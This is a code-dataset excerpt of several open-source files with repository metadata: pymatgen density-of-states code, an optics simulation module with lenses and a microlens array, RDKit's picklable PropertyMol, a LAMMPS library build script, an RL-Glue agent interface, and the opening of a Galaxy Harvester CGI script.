el_dos[orbital_type] = add_densities(el_dos[orbital_type], pdos)
return {orb: Dos(self.efermi, self.energies, densities) for orb, densities in el_dos.items()}
@property
def spin_polarization(self) -> float:
"""
Calculates spin polarization at Fermi level.
See Sanvito et al., doi: 10.1126/sciadv.1602241 for
an example usage.
        :return (float): spin polarization in the range [0, 1]; returns NaN
            if the spin polarization is ill-defined (e.g. for an insulator).
"""
n_F = self.get_interpolated_value(self.efermi)
n_F_up = n_F[Spin.up]
n_F_down = n_F[Spin.down]
if (n_F_up + n_F_down) == 0:
            # only well defined for metals or half-metals
return float("NaN")
spin_polarization = (n_F_up - n_F_down) / (n_F_up + n_F_down)
return abs(spin_polarization)
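    # Worked example for the formula above: with n_up = 0.75 and
    # n_down = 0.25 states/eV at the Fermi level, the spin polarization is
    # |0.75 - 0.25| / (0.75 + 0.25) = 0.5, i.e. 50% polarized.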
@classmethod
def from_dict(cls, d) -> "CompleteDos":
"""
Returns CompleteDos object from dict representation.
"""
tdos = Dos.from_dict(d)
struct = Structure.from_dict(d["structure"])
pdoss = {}
for i in range(len(d["pdos"])):
at = struct[i]
orb_dos = {}
for orb_str, odos in d["pdos"][i].items():
orb = Orbital[orb_str]
orb_dos[orb] = {Spin(int(k)): v for k, v in odos["densities"].items()}
pdoss[at] = orb_dos
return CompleteDos(struct, tdos, pdoss)
def as_dict(self) -> dict:
"""
Json-serializable dict representation of CompleteDos.
"""
d = {
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"efermi": self.efermi,
"structure": self.structure.as_dict(),
"energies": self.energies.tolist(),
"densities": {str(spin): dens.tolist() for spin, dens in self.densities.items()},
"pdos": [],
}
if len(self.pdos) > 0:
for at in self.structure:
dd = {}
for orb, pdos in self.pdos[at].items():
dd[str(orb)] = {
"densities": {str(int(spin)): list(dens) for spin, dens in pdos.items()} # type: ignore
}
d["pdos"].append(dd)
d["atom_dos"] = {str(at): dos.as_dict() for at, dos in self.get_element_dos().items()}
d["spd_dos"] = {str(orb): dos.as_dict() for orb, dos in self.get_spd_dos().items()}
return d
def __str__(self):
return "Complete DOS for " + str(self.structure)
class LobsterCompleteDos(CompleteDos):
"""
Extended CompleteDOS for Lobster
"""
def get_site_orbital_dos(self, site: PeriodicSite, orbital: str) -> Dos: # type: ignore
"""
Get the Dos for a particular orbital of a particular site.
Args:
site: Site in Structure associated with CompleteDos.
orbital: principal quantum number and orbital in string format, e.g. "4s".
possible orbitals are: "s", "p_y", "p_z", "p_x", "d_xy", "d_yz", "d_z^2",
"d_xz", "d_x^2-y^2", "f_y(3x^2-y^2)", "f_xyz",
"f_yz^2", "f_z^3", "f_xz^2", "f_z(x^2-y^2)", "f_x(x^2-3y^2)"
In contrast to the Cohpcar and the Cohplist objects, the strings from the Lobster files are used
Returns:
Dos containing densities of an orbital of a specific site.
"""
if orbital[1:] not in [
"s",
"p_y",
"p_z",
"p_x",
"d_xy",
"d_yz",
"d_z^2",
"d_xz",
"d_x^2-y^2",
"f_y(3x^2-y^2)",
"f_xyz",
"f_yz^2",
"f_z^3",
"f_xz^2",
"f_z(x^2-y^2)",
"f_x(x^2-3y^2)",
]:
raise ValueError("orbital is not correct")
return Dos(self.efermi, self.energies, self.pdos[site][orbital]) # type: ignore
def get_site_t2g_eg_resolved_dos(self, site: PeriodicSite) -> Dict[str, Dos]:
"""
Get the t2g, eg projected DOS for a particular site.
Args:
site: Site in Structure associated with CompleteDos.
Returns:
A dict {"e_g": Dos, "t2g": Dos} containing summed e_g and t2g DOS
for the site.
"""
warnings.warn("Are the orbitals correctly oriented? Are you sure?")
t2g_dos = []
eg_dos = []
for s, atom_dos in self.pdos.items():
if s == site:
for orb, pdos in atom_dos.items():
if _get_orb_lobster(orb) in (Orbital.dxy, Orbital.dxz, Orbital.dyz):
t2g_dos.append(pdos)
elif _get_orb_lobster(orb) in (Orbital.dx2, Orbital.dz2):
eg_dos.append(pdos)
return {
"t2g": Dos(self.efermi, self.energies, functools.reduce(add_densities, t2g_dos)),
"e_g": Dos(self.efermi, self.energies, functools.reduce(add_densities, eg_dos)),
}
def get_spd_dos(self) -> Dict[str, Dos]: # type: ignore
"""
Get orbital projected Dos.
        For example, if 3s and 4s are included in the basis of some element,
        they will both be summed in the orbital-projected DOS.
Returns:
dict of {orbital: Dos}, e.g. {"s": Dos object, ...}
"""
spd_dos = {}
for atom_dos in self.pdos.values():
for orb, pdos in atom_dos.items():
orbital_type = _get_orb_type_lobster(orb)
if orbital_type not in spd_dos:
spd_dos[orbital_type] = pdos
else:
spd_dos[orbital_type] = add_densities(spd_dos[orbital_type], pdos)
return {orb: Dos(self.efermi, self.energies, densities) for orb, densities in spd_dos.items()}
def get_element_spd_dos(self, el: SpeciesLike) -> Dict[str, Dos]: # type: ignore
"""
Get element and spd projected Dos
Args:
el: Element in Structure.composition associated with LobsterCompleteDos
        Returns:
            dict of {OrbitalType: Dos} for the given element.
"""
el = get_el_sp(el)
el_dos = {}
for site, atom_dos in self.pdos.items():
if site.specie == el:
for orb, pdos in atom_dos.items():
orbital_type = _get_orb_type_lobster(orb)
if orbital_type not in el_dos:
el_dos[orbital_type] = pdos
else:
el_dos[orbital_type] = add_densities(el_dos[orbital_type], pdos)
return {orb: Dos(self.efermi, self.energies, densities) for orb, densities in el_dos.items()}
@classmethod
def from_dict(cls, d) -> "LobsterCompleteDos":
"""
Returns: CompleteDos object from dict representation.
"""
tdos = Dos.from_dict(d)
struct = Structure.from_dict(d["structure"])
pdoss = {}
for i in range(len(d["pdos"])):
at = struct[i]
orb_dos = {}
for orb_str, odos in d["pdos"][i].items():
orb = orb_str
orb_dos[orb] = {Spin(int(k)): v for k, v in odos["densities"].items()}
pdoss[at] = orb_dos
return LobsterCompleteDos(struct, tdos, pdoss)
def add_densities(density1: Dict[Spin, ArrayLike], density2: Dict[Spin, ArrayLike]) -> Dict[Spin, ArrayLike]:
"""
Method to sum two densities.
Args:
density1: First density.
density2: Second density.
Returns:
Dict of {spin: density}.
"""
return {spin: np.array(density1[spin]) + np.array(density2[spin]) for spin in density1.keys()}
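# Minimal sketch of add_densities on toy arrays (values made up):
#   d1 = {Spin.up: np.array([1.0, 2.0])}
#   d2 = {Spin.up: np.array([0.5, 0.5])}
#   add_densities(d1, d2) # -> {Spin.up: array([1.5, 2.5])}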
def _get_orb_type(orb):
try:
return orb.orbital_type
except AttributeError:
return orb
def f0(E, fermi, T):
"""
    Returns the equilibrium Fermi-Dirac occupation.
Args:
E (float): energy in eV
fermi (float): the fermi level in eV
T (float): the temperature in kelvin
"""
return 1.0 / (1.0 + np.exp((E - fermi) / (_cd("Boltzmann constant in eV/K") * T)))
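# Sanity check for f0: at E == fermi the occupation is exactly 0.5 at any
# finite temperature, e.g. f0(0.5, 0.5, 300) == 0.5, and the distribution
# sharpens toward a step function as T -> 0.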
def _get_orb_type_lobster(orb):
"""
Args:
orb: string representation of orbital
Returns:
OrbitalType
"""
orb_labs = [
"s",
"p_y",
"p_z",
"p_x",
"d_xy",
"d_yz",
"d_z^2",
"d_xz",
"d_x^2-y^2",
"f_y(3x^2-y^2)",
"f_xyz",
"f_yz^2",
"f_z^3",
"f_xz^2",
"f_z(x^2-y^2)",
"f_x(x^2-3y^2)",
]
    try:
        orbital = Orbital(orb_labs.index(orb[1:]))
        return orbital.orbital_type
    except ValueError:
        # .index() raises ValueError when the orbital label is unknown
        print("Orb not in list")
        return None
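# Example (hedged): the leading character is the principal quantum number and
# is stripped, so _get_orb_type_lobster("2p_x") looks up "p_x" and returns
# OrbitalType.p, while _get_orb_type_lobster("4d_xy") returns OrbitalType.d.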
def _get_orb_lobster(orb):
"""
Args:
orb: string representation of orbital
Returns:
Orbital
"""
orb_labs = [
"s",
"p_y",
"p_z",
"p_x",
"d_xy",
"d_yz",
"d_z^2",
"d_xz",
"d_x^2-y^2",
"f_y(3x^2-y^2)",
"f_xyz",
"f_yz^2",
"f_z^3",
"f_xz^2",
"f_z(x^2-y^2)",
"f_x(x^2-3y^2)",
]
    try:
        orbital = Orbital(orb_labs.index(orb[1:]))
        return orbital
    except ValueError:
        # .index() raises ValueError when the orbital label is unknown
        print("Orb not in list")
        return None
|
richardtran415/pymatgen
|
pymatgen/electronic_structure/dos.py
|
Python
|
mit
| 39,371
|
[
"DIRAC",
"Gaussian",
"VASP",
"pymatgen"
] |
effed105ee490215690fa8e71c387eb6c9fca34eb821876444089f6cda5950f9
|
"""This contains classes modelling optical elements such as lenses.
Each optical element has a focal length and width and implements the method
"apply", which enables it to modify an incident wave
Authors:
Adam Rains
"""
from __future__ import division, print_function
import numpy as np
import opticstools as optics_tools
import opticstools.utils as utils
import piaa
class OpticalElement:
"""The base class for all optical elements."""
def __init__(self, focal_length, width):
"""Initialisation for an OpticalElement.
Parameters
----------
focal_length: float
The focal length in mm.
width: float
The width in mm.
"""
self.focal_length = focal_length
self.width = width
def apply(self, input_ef, npix, dx, wavelength_in_mm):
"""Used to modify the incident wave as it passes through the
OpticalElement. The simplest implementation does not modify the incident
wave.
Parameters
----------
input_ef: np.array([[...]...])
2D square incident wave consisting of complex numbers.
npix: int
            Size of input_ef per side, preferably a power of two (npix=2**n)
dx: float
Resolution of the wave in mm/pixel
wavelength_in_mm: float
Wavelength of the wave in mm
Return
------
input_ef: np.array([[...]...])
Unchanged incident wave.
"""
return input_ef
class CircularLens(OpticalElement):
"""A CircularLens OpticalElement - application of a curved wavefront and
circular mask"""
def apply(self, input_ef, npix, dx, wavelength_in_mm):
"""Used to modify the incident wave as it passes through the
CircularLens.
Parameters
----------
input_ef: np.array([[...]...])
2D square incident wave consisting of complex numbers.
npix: int
Size of input_wf per side, preferentially a power of two (npix=2**n)
dx: float
Resolution of the wave in mm/pixel
wavelength_in_mm: float
Wavelength of the wave in mm
Return
------
output_ef: np.array([[...]...])
The modified wave after application of the curved wavefront and
circular mask.
"""
# Apply a circular mask
masked_ef = utils.circle(npix, (self.width / dx)) * input_ef
# Apply the curved wavefront of the lens
curved_wf = optics_tools.curved_wf(npix, dx, self.focal_length,
wavelength_in_mm)
output_ef = masked_ef * curved_wf
return output_ef
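# A hedged usage sketch: propagate a uniform plane wave through a
# CircularLens. The grid size, resolution, focal length and wavelength below
# are made-up illustration values.
def _circular_lens_sketch():
    npix = 256 # pixels per side
    dx = 0.01 # mm/pixel
    wavelength_in_mm = 0.5e-3 # 500 nm expressed in mm
    lens = CircularLens(focal_length=200.0, width=1.0)
    input_ef = np.ones((npix, npix), dtype=complex) # uniform plane wave
    return lens.apply(input_ef, npix, dx, wavelength_in_mm)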
class MicrolensArray_3x3(OpticalElement):
"""A 3x3 microlens array OpticalElement - a 3x3 square grid of lenses, each
coming to its own focus.
"""
def apply(self, input_ef, npix, dx, wavelength_in_mm):
"""Applies 3x3 curved wavefronts and square masks to the incident wave.
Parameters
----------
input_ef: np.array([[...]...])
2D square incident wave consisting of complex numbers.
npix: int
            Size of input_ef per side, preferably a power of two (npix=2**n)
dx: float
Resolution of the wave in mm/pixel
wavelength_in_mm: float
Wavelength of the wave in mm
Return
------
output_ef: np.array([[...]...])
The modified wave after application of the 3x3 curved wavefronts and
square mask.
"""
# Initialise the resultant electric field
# (that will be the addition of each of the 9 micro-lenslets)
        output_ef = np.zeros((npix, npix), dtype=complex)
        # Create the square window that will be shifted around to represent
        # the light getting into each micro-lenslet
square = utils.square(npix, self.width/dx) + 0j
# Starting in the top left, track the window over each row
for x in range(-1,2):
for y in range(-1,2):
# Calculate the base shift (the actual shift requires the -1,
# 0 or 1 multiplier to get direction)
shift = int(self.width/dx)
# Have the window be a curved wavefront and shift as required
curved_wf = optics_tools.curved_wf(npix, dx, self.focal_length,
wavelength_in_mm)
y_shift = np.roll((square*curved_wf), shift*y, axis=1)
xy_shift = np.roll(y_shift, shift*x, axis=0)
# Add the resulting wavefront to a field containing the
# wavefronts of all 9 lenses
output_ef = output_ef + xy_shift * input_ef
return output_ef
def apply_propagate_and_couple(self, input_ef, npix, dx, wavelength_in_mm,
distance_to_fibre, input_field, offset,
fibre_mode, real_offsets=None,
offset_ifu=None, test=False):
"""Applies 3x3 curved wavefronts and square masks to the incident wave.
Parameters
----------
input_ef: np.array([[...]...])
2D square incident wave consisting of complex numbers.
npix: int
            Size of input_ef per side, preferably a power of two (npix=2**n)
dx: float
Resolution of the wave in mm/pixel
wavelength_in_mm: float
Wavelength of the wave in mm
distance_to_fibre: float
The distance to the optical fibre plane from the front of the
microlens array.
input_field: float
Sum of the EF at the telescope pupil (used to calculate the
throughput and any losses)
offset: integer
Number of pixels that the 8 non-central microlenses are offset
radially outwards by at the fibre plane.
fibre_mode: np.array([[...]...])
2D square mode of the optical fibre, constructed from a combination
of Bessel functions
Return
------
        output_ef: np.array([[...]...])
            The wave at the fibre plane after application of the 3x3 curved
            wavefronts and square masks and propagation to the fibres.
        coupling_1_to_9: list of float (length 9)
            The coupling of the wave at the fibre plane with the fibre mode
            for each of the 9 fibres.
        aperture_loss_1_to_9: list of float (length 9)
            The aperture loss (fraction of the input field power reaching
            the fibre plane) for each of the 9 fibres.
        eta_1_5_9: [float, float, float]
            The efficiency/throughput (eta = coupling * aperture loss)
            summed over the central fibre (1), the central row and column
            (5) and the entire 3x3 array (9).
"""
npix = int(npix)
# Initialise the resultant electric field (that will be the addition of
# each of the 9 micro-lenslets)
out_ef = np.zeros((npix, npix)) + 0j
# Initialise the displacement of each square from the centre
shift = int(self.width / dx)
# Create the square window that will be used to represent the light
# getting into each micro-lenslet
square = utils.square(npix, self.width/dx) + 0j
curved_square = optics_tools.curved_wf(shift, dx, self.focal_length,
wavelength_in_mm)
# Variable to store the coupling for the central fibre (1), centre and
# horizontal/vertical fibres (5) and all, including diagonals (9)
coupling_1_to_9 = []
aperture_loss_1_to_9 = []
        eta_1_5_9 = [0, 0, 0]
        # For each of the 9 microlenses
        for x in range(-1, 2):
            for y in range(-1, 2):
# Shift the desired square to the centre
y_shifted_ef = np.roll(input_ef, -shift*y, axis=1)
xy_shifted_ef = np.roll(y_shifted_ef, -shift*x, axis=0)
#--------------------------------------------------------------
# Computing coupling with *real* offsets
#--------------------------------------------------------------
                if test:
                    fibre_num = int(offset_ifu[x+1, y+1])
                    fibre_x = int(np.round(real_offsets[fibre_num][0]))
                    fibre_y = int(np.round(real_offsets[fibre_num][2]))
                    # Positive shift in y (axis 0) is down
                    # Positive shift in x (axis 1) is right
                    xy_shifted_ef = np.roll(xy_shifted_ef, -fibre_x, axis=1)
                    xy_shifted_ef = np.roll(xy_shifted_ef, -fibre_y, axis=0)
#--------------------------------------------------------------
# Apply the window and curved wavefront
sub_ef = xy_shifted_ef[(npix//2 - shift//2):(npix//2 + shift//2),
(npix//2 - shift//2):(npix//2 + shift//2)]
curved_ef = curved_square * sub_ef
# Propagate the light passing through the microlens to the fibre
ef_at_fibre = optics_tools.propagate_by_fresnel(curved_ef, dx,
distance_to_fibre,
wavelength_in_mm)
# Add the resulting wavefront to a field containing the
# wavefronts of all 9 lenses
side = int(npix/2 - 1.5*shift)
out_ef[(side + shift*(x+1)):(side + shift*(x+2)),
(side + shift*(y+1)):(side + shift*(y+2))] = ef_at_fibre
# Compute the coupling, applying an offset to the fibre mode as
# required (To account for the outer fibres being off centre and
# displaced outwards)
coupling = optics_tools.compute_coupling(npix, dx, ef_at_fibre,
self.width, fibre_mode,
-offset*x, -offset*y)
coupling_1_to_9.append(coupling)
                # Compute aperture loss and eta
                # Calculate the aperture loss for the microlens as the
                # fraction of the input field power that reaches the fibre
aperture_loss_fibre = np.sum(np.abs(ef_at_fibre)**2)/input_field
aperture_loss_1_to_9.append(aperture_loss_fibre)
# Calculate and combine the eta for each set of lenses (1, 5, 9)
# 1 Fibre
if (x == 0) and (y == 0):
eta_1_5_9[0] += coupling * aperture_loss_fibre
# 5 Fibres
if not ((np.abs(x) == 1) and (np.abs(y) == 1)):
eta_1_5_9[1] += coupling * aperture_loss_fibre
# 9 Fibres
eta_1_5_9[2] += coupling * aperture_loss_fibre
return out_ef, coupling_1_to_9, aperture_loss_1_to_9, eta_1_5_9
class PIAAOptics(OpticalElement):
"""A set of PIAAOptics as an OpticalElement - two lenses separated by a
known difference. Implements functions in piaa.py."""
def __init__(self, alpha, r0, frac_to_focus, n_med, thickness, radius_in_mm,
real_heights, dx, npix, wavelength_in_mm):
"""Generates the phase aberrations introduced by each of a pair of PIAA
lenses given the relevant parameters.
Parameters
----------
alpha: float
In the formula for I_1 - the exponent of the Gaussian intensity.
r0: float
The fractional radius of the telescope secondary obstruction in the
annulus. e.g. for a 40% obstruction, this would be 0.4.
frac_to_focus: float
The fraction (2nd surface z coord - 1st surface z coord)/
(focus z coord - 1st surface z coord)
        n_med: float
            Refractive index of the medium. Used to compensate for the glass
            and give extra power to the new optic, as well as to estimate
            the height.
        thickness: float
            Physical thickness/distance between the realised PIAA lenses.
        radius_in_mm: float
            Physical radius of each realised PIAA lens.
        real_heights: bool
            Currently has no effect.
        dx: float
            Resolution/sampling in mm/pixel.
npix: int
The number of pixels.
wavelength_in_mm: float
The wavelength of the light in mm.
"""
# Store parameters
self.alpha = alpha
self.r0 = r0
self.frac_to_focus = frac_to_focus
self.n_med = n_med
self.thickness = thickness
self.radius_in_mm = radius_in_mm
self.real_heights = real_heights
self.dx = dx
self.npix = npix
self.wavelength_in_mm = wavelength_in_mm
# Generate PIAA lenses #1 and #2
self.piaa_lens1, self.piaa_lens2 = piaa.create_piaa_lenses(self.alpha,
self.r0, self.frac_to_focus,
self.n_med, self.thickness,
self.radius_in_mm, self.real_heights,
self.dx, self.npix,
self.wavelength_in_mm)
def apply(self, input_ef):
"""Applies the first PIAA lens to the incident wave, propagates the
result to the second PIAA lens before applying it too.
Parameters
----------
input_ef: np.array([[...]...])
2D square incident wave consisting of complex numbers.
Return
------
output_ef: np.array([[...]...])
The modified wave after application of the PIAA optics
"""
# Pass the electric field through the first PIAA lens
ef_1 = input_ef * np.exp(1j * self.piaa_lens1)
# Propagate the electric field through glass to the second lens
ef_2 = optics_tools.propagate_by_fresnel(ef_1, self.dx,
self.thickness / self.n_med,
self.wavelength_in_mm)
# Pass the electric field through the second PIAA lens
output_ef = ef_2 * np.exp(1j * self.piaa_lens2)
return output_ef
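# --- Illustrative usage sketch (not part of the original module) ---
# A hedged example of how these OpticalElements might be chained, assuming
# this package's `utils`, `optics_tools` and `piaa` modules are importable
# and that each element carries the `width` and `focal_length` attributes
# the methods above expect. Names and numbers below are placeholders, not
# values from the original code.
#
#   npix, dx, wavelength_in_mm = 1024, 0.01, 0.0005
#   input_ef = utils.circle(npix, 200) + 0j   # a uniform circular pupil
#   lens = CircularLens()                     # hypothetical construction
#   lens.width, lens.focal_length = 1.0, 10.0
#   ef = lens.apply(input_ef, npix, dx, wavelength_in_mm)
#   mla = MicrolensArray_3x3()                # hypothetical construction
#   mla.width, mla.focal_length = 0.3, 2.0
#   ef = mla.apply(ef, npix, dx, wavelength_in_mm)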
|
mikeireland/astro-optics
|
optics.py
|
Python
|
mit
| 15,640
|
[
"Gaussian"
] |
714a3e7f1b2d61c308b2ddc6b4261947f3f4eada72798a0fcb202e2e30d73614
|
# $Id$
#
# Copyright (C) 2007-2010 Greg Landrum
# All Rights Reserved
#
from rdkit import Chem
class PropertyMol(Chem.Mol):
""" allows rdkit molecules to be pickled with their properties saved.
>>> import cPickle
>>> m = Chem.MolFromMolFile('test_data/benzene.mol')
>>> m.GetProp('_Name')
'benzene.mol'
by default pickling removes properties:
>>> m2 = cPickle.loads(cPickle.dumps(m))
>>> m2.HasProp('_Name')
0
Property mols solve this:
>>> pm = PropertyMol(m)
>>> pm.GetProp('_Name')
'benzene.mol'
>>> pm.SetProp('MyProp','foo')
>>> pm.HasProp('MyProp')
1
>>> pm2 = cPickle.loads(cPickle.dumps(pm))
>>> Chem.MolToSmiles(pm2)
'c1ccccc1'
>>> pm2.GetProp('_Name')
'benzene.mol'
>>> pm2.HasProp('MyProp')
1
>>> pm2.GetProp('MyProp')
'foo'
>>> pm2.HasProp('MissingProp')
0
Property mols are a bit more permissive about the types
of property values:
>>> pm.SetProp('IntVal',1)
That wouldn't work with a standard mol:
>>> m.SetProp('IntVal',1)
Traceback (most recent call last):
...
ArgumentError: Python argument types in
Mol.SetProp(Mol, str, int)
did not match C++ signature:
...
but the Property mols still convert all values to strings before storing:
>>> pm.GetProp('IntVal')
'1'
This is a test for sf.net issue 2880943: make sure properties end up in SD files:
>>> import tempfile,os
>>> fn = tempfile.mktemp('.sdf')
>>> w = Chem.SDWriter(fn)
>>> w.write(pm)
>>> w=None
>>> txt = file(fn,'r').read()
>>> '<IntVal>' in txt
True
>>> try:
... os.unlink(fn)
... except:
... pass
The next level of that bug: does writing a *depickled* propertymol
to an SD file include properties:
>>> fn = tempfile.mktemp('.sdf')
>>> w = Chem.SDWriter(fn)
>>> pm = cPickle.loads(cPickle.dumps(pm))
>>> w.write(pm)
>>> w=None
>>> txt = file(fn,'r').read()
>>> '<IntVal>' in txt
True
>>> try:
... os.unlink(fn)
... except:
... pass
"""
__getstate_manages_dict__=True
def __init__(self,mol):
if not isinstance(mol,Chem.Mol): return
Chem.Mol.__init__(self,mol.ToBinary())
for pn in mol.GetPropNames(includePrivate=True):
self.SetProp(pn,mol.GetProp(pn))
def SetProp(self,nm,val):
Chem.Mol.SetProp(self,nm,str(val))
  def __getstate__(self):
    # pickle the molecule as its binary form plus a dictionary of all of
    # its properties (including private ones)
    pDict={}
    for pn in self.GetPropNames(includePrivate=True):
      pDict[pn] = self.GetProp(pn)
    return {'pkl':self.ToBinary(),
            'propD':pDict}
  def __setstate__(self,stateD):
    # rebuild the molecule from its binary form, then re-attach the saved
    # properties
    Chem.Mol.__init__(self,stateD['pkl'])
    for prop,val in stateD['propD'].iteritems():
      self.SetProp(prop,val)
#------------------------------------
#
# doctest boilerplate
#
def _test():
import doctest,sys
return doctest.testmod(sys.modules["__main__"],optionflags=doctest.ELLIPSIS)
if __name__ == '__main__':
import sys
failed,tried = _test()
sys.exit(failed)
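#------------------------------------
# Porting note (not part of the original file): this module targets
# Python 2 (cPickle, file(), dict.iteritems()). Under Python 3 the same
# round-trip would look roughly like:
#
#   import pickle
#   pm = PropertyMol(Chem.MolFromMolFile('test_data/benzene.mol'))
#   pm2 = pickle.loads(pickle.dumps(pm))
#
# with the iteritems() call in __setstate__ replaced by items().
#------------------------------------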
|
rdkit/rdkit-orig
|
rdkit/Chem/PropertyMol.py
|
Python
|
bsd-3-clause
| 2,973
|
[
"RDKit"
] |
fb0e754af5d720da2a522804601c9ec62100c9edf9a4eacf29596204bbbf67a4
|
#!/usr/bin/env python
"""
Install.py tool to do a generic build of a library
soft linked to by many of the lib/Install.py files
used to automate the steps described in the corresponding lib/README
"""
from __future__ import print_function
import sys, os, subprocess
from argparse import ArgumentParser
sys.path.append('..')
from install_helpers import get_cpus, fullpath
parser = ArgumentParser(prog='Install.py',
description="LAMMPS library build wrapper script")
HELP = """
Syntax from src dir: make lib-libname args="-m machine -e suffix"
Syntax from lib dir: python Install.py -m machine -e suffix
libname = name of lib dir (e.g. atc, h5md, meam, poems, etc)
specify -m and optionally -e, order does not matter
Examples:
make lib-poems args="-m serial" # build POEMS lib with same settings as in the serial Makefile in src
make lib-colvars args="-m mpi" # build USER-COLVARS lib with same settings as in the mpi Makefile in src
make lib-meam args="-m ifort" # build MEAM lib with custom Makefile.ifort (using Intel Fortran)
"""
# parse and process arguments
parser.add_argument("-m", "--machine",
help="suffix of a <libname>/Makefile.* file used for compiling this library")
parser.add_argument("-e", "--extramake",
help="set EXTRAMAKE variable in <libname>/Makefile.<machine> to Makefile.lammps.<extramake>")
args = parser.parse_args()
# print help message and exit, if neither build nor path options are given
if not args.machine and not args.extramake:
parser.print_help()
sys.exit(HELP)
machine = args.machine
# rewrite EXTRAMAKE only when -e/--extramake was given
extraflag = bool(args.extramake)
suffix = args.extramake
# set lib from working dir
cwd = fullpath('.')
lib = os.path.basename(cwd)
# create Makefile.auto as copy of Makefile.machine
# reset EXTRAMAKE if requested
if not os.path.exists("Makefile.%s" % machine):
sys.exit("lib/%s/Makefile.%s does not exist" % (lib, machine))
lines = open("Makefile.%s" % machine, 'r').readlines()
fp = open("Makefile.auto", 'w')
has_extramake = False
for line in lines:
words = line.split()
if len(words) == 3 and words[0] == "EXTRAMAKE" and words[1] == '=':
has_extramake = True
if extraflag:
line = line.replace(words[2], "Makefile.lammps.%s" % suffix)
fp.write(line)
fp.close()
# make the library via Makefile.auto optionally with parallel make
n_cpus = get_cpus()
print("Building lib%s.a ..." % lib)
cmd = "make -f Makefile.auto clean; make -f Makefile.auto -j%d" % n_cpus
try:
txt = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
print(txt.decode('UTF-8'))
except subprocess.CalledProcessError as e:
print("Make failed with:\n %s" % e.output.decode('UTF-8'))
sys.exit(1)
if os.path.exists("lib%s.a" % lib):
print("Build was successful")
else:
sys.exit("Build of lib/%s/lib%s.a was NOT successful" % (lib, lib))
if has_extramake and not os.path.exists("Makefile.lammps"):
print("WARNING: lib/%s/Makefile.lammps was NOT created" % lib)
|
Pakketeretet2/lammps
|
lib/Install.py
|
Python
|
gpl-2.0
| 2,989
|
[
"LAMMPS"
] |
e656cbc92acf1f9f8c72696fe2c9672132bdfc9335f759eb8dfa4339f1b75032
|
#
# Copyright (C) 2007, Mark Lee
#
#http://rl-glue-ext.googlecode.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# $Revision: 446 $
# $Date: 2009-01-22 20:20:21 -0700 (Thu, 22 Jan 2009) $
# $Author: brian@tannerpages.com $
# $HeadURL: http://rl-glue-ext.googlecode.com/svn/trunk/projects/codecs/Python/src/rlglue/agent/Agent.py $
from rlglue.types import Action
from rlglue.types import Observation
# BEGIN: change made by: Akshay Narayan (06-01-2015:1022)
from rlglue.types import Reward
# END: change made by: Akshay Narayan (06-01-2015:1022)
class Agent:
    # (string) -> void
    def agent_init(self, taskSpecification):
        pass
    # (Observation) -> Action
    def agent_start(self, observation):
        pass
    # BEGIN: change made by: Akshay Narayan (06-01-2015:1023)
    ## (double, Observation) -> Action
    # (Reward, Observation) -> Action
    # END: change made by: Akshay Narayan (06-01-2015:1023)
    def agent_step(self, reward, observation):
        pass
    # BEGIN: change made by: Akshay Narayan (06-01-2015:1023)
    ## (double) -> void
    # (Reward) -> void
    # END: change made by: Akshay Narayan (06-01-2015:1023)
    def agent_end(self, reward):
        pass
    # () -> void
    def agent_cleanup(self):
        pass
    # (string) -> string
    def agent_message(self, message):
        pass
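# --- Illustrative example (not part of the original codec) ---
# A minimal concrete agent implementing the interface above. It ignores
# the task specification and always returns an empty Action; a real agent
# would populate the Action and learn from the reward signal.
class ExampleNullAgent(Agent):
    def agent_init(self, taskSpecification):
        pass
    def agent_start(self, observation):
        return Action()
    def agent_step(self, reward, observation):
        return Action()
    def agent_end(self, reward):
        pass
    def agent_cleanup(self):
        pass
    def agent_message(self, message):
        return ""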
|
okkhoy/mo-rlglue-python-codec
|
rlglue/agent/Agent.py
|
Python
|
mit
| 1,727
|
[
"Brian"
] |
73d8c1785a771b47ac650af7350e99fb7741e555fb88b4a1aafdfc8505f1be5e
|
#!/usr/bin/env python3
"""
Copyright 2020 Paul Willworth <ioscode@gmail.com>
This file is part of Galaxy Harvester.
Galaxy Harvester is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Galaxy Harvester is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with Galaxy Harvester. If not, see <http://www.gnu.org/licenses/>.
"""
import cgi
import pymysql
import dbShared
#
form = cgi.FieldStorage()
resCategory = form.getfirst('resCategory', '')
outType = form.getfirst('outType', '')
# escape input to prevent sql injection
resCategory = dbShared.dbInsertSafe(resCategory)
outType = dbShared.dbInsertSafe(outType)
print('Content-type: text/html\n')
if outType == 'links':
print('<ul class="plain">')
elif outType == 'graphic':
print('')
else:
print('<option value="none" title="p00000000000">None</option>')
if len(resCategory) > 0:
joinStr = ' INNER JOIN (SELECT resourceGroup FROM tResourceGroupCategory WHERE resourceCategory = "' + resCategory + '") rgc ON tResourceGroup.resourceGroup = rgc.resourceGroup'
else:
joinStr = ''
conn = dbShared.ghConn()
cursor = conn.cursor()
if cursor:
